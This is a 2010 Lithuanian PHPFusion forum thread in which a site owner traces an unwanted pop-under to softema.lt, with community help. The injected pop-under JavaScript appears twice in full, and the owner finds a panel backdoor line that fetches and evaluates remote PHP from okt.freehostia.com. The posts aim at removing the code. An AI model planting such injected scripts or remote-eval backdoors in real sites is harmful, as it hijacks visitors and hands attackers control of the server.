Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: pop upas iš niekur

Parašė Narysx· 2010 Sau. 4 14:01:11
#1

Kas per nesąmonė, nedėjau pas save jokių pop upų, bet kiekvieną dieną pirmą kart užėjus į web išmeta softema.lt :?

Parašė edeni· 2010 Sau. 4 14:01:09
#2

Patikrink savo freshsound.lt TOP panele mačiau ten yra javascriptas įdėtas.

Parašė Narysx· 2010 Sau. 4 14:01:10
#3

:? Nėra ten jokio js.

Parašė nbanba· 2010 Sau. 4 14:01:46
#4

In source:
<script type="text/javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "softema"; var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://softema.lt";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc1 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ((utc1 - utc2)/1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>



Redagavo nbanba· 2010 Sau. 4 14:01:33

Parašė Narysx· 2010 Sau. 4 14:01:57
#5

O kažin kaip jį išimt. :?

Parašė nbanba· 2010 Sau. 4 15:01:29
#6

Narysx parašė:
O kažin kaip jį išimt. :?


Paprasčiausiai ištrink visą tą kodą kur nukopijavau ir viskas.

Parašė Narysx· 2010 Sau. 4 15:01:10
#7

Tai žinau, bet kur jį rast? ;D

Parašė Narysx· 2010 Sau. 4 16:01:52
#8

Help... Ieškojau to kodo themes/template foldeyje, bet neradau niekur.

Parašė nesby· 2010 Sau. 4 17:01:21
#9

Narysx parašė:
Help... Ieškojau to kodo themes/template foldeyje, bet neradau niekur.


mesk viska i notepad++ papsausi pieska ir ieskos per visus failus

Parašė Narysx· 2010 Sau. 10 12:01:51
#10

Kai įeinu į web ir atsidarau source, rodo, kad top panelėj yra toks js:

<script type="text/javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "softema"; var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://softema.lt";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc1 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ((utc1 - utc2)/1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>




kai prisijungiu, vėl žiūriu source, tada to kodo nebebūna. Atsijungiu - vėl būna. Kitaip sakant, būna tik tada, kai esi svečias. Prisijungiau, nuėjau į paneles, bet ten jokio source kodo nėra. :? Kaip patartumėt išimt?

Redagavo Narysx· 2010 Sau. 10 12:01:01

Parašė Žmogus· 2010 Sau. 10 13:01:51
#11

Peržiūrėt visus failus

Parašė Narysx· 2010 Sau. 10 13:01:36
#12

O kaip reikia? Tipo visus ftp failus susikelt į pc ir per notepad ++ pažiūrėt?

Parašė Žmogus· 2010 Sau. 10 13:01:06
#13

Nu tai per FTP viską peržiūrai

Parašė Narysx· 2010 Sau. 10 13:01:55
#14

Man per FTP atidaro failus su notepad paprastu. Kaip pakeist?

Parašė Narysx· 2010 Sau. 10 18:01:32
#15

Parsisiunčiau visus failus iš ftp, atsidariau per notepad++, padariau paiešką per visus failus, bet neradau to js. :?

Parašė sidicer· 2010 Sau. 10 18:01:09
#16

EEik i phpMyAdmin. Eik i fusion_panels. ir ten pramesk akimis pro panleiu kodus...

Parašė Narysx· 2010 Sau. 11 18:01:52
#17

Permečiau, nieko neradau. :?

Parašė robert· 2010 Sau. 11 19:01:20
#18

side_left.php peržiūrėk

Parašė Narysx· 2010 Sau. 11 19:01:36
#19

Nėra tokio failo. V7 fusion'as.

Parašė Narysx· 2010 Sau. 11 19:01:08
#20

Žodžiu, parsisiunčiau visus failus iš ftp ir kaip dbr padaryt, kad per visą freshsound.lt folderį ieškotų žodžio? Žinau, tik kaip susimetus visus failus paleist paiešką, bet tuos failus susimest visus belekiek užima laiko, nes ten lb daug tų folderių (tarkim includes folderyje) ir užsiknisimo daug. Gal yra greitesnis variantas?

Parašė Narysx· 2010 Sau. 13 20:01:35
#21

Žodžiu, pop up kodas atsiranda panelėse. Jis atrodo taip:

@eval(file_get_contents("http://okt.freehostia.com/s.php"));




kažin kur gali būt skylė, kad įrašo į paneles kodą. :?

Parašė 7even· 2010 Sau. 14 15:01:17
#22

http://okt.freehostia.com/s viskas tuom ir pasakyta

Parašė Narysx· 2010 Sau. 14 15:01:02
#23

Man tai tas nieko nesako... ;D

Parašė Impossibru· 2010 Sau. 14 15:01:11
#24

Vienas iš tavo admin žaidžia... Susikuri panelę naują,ir ištrini tą failą per kurį kuriamos panelės,kai reikės vėl įsidėsi.

Parašė Narysx· 2010 Sau. 14 16:01:40
#25

Ok. ;) Žiūrėsim ar nebeatsiras.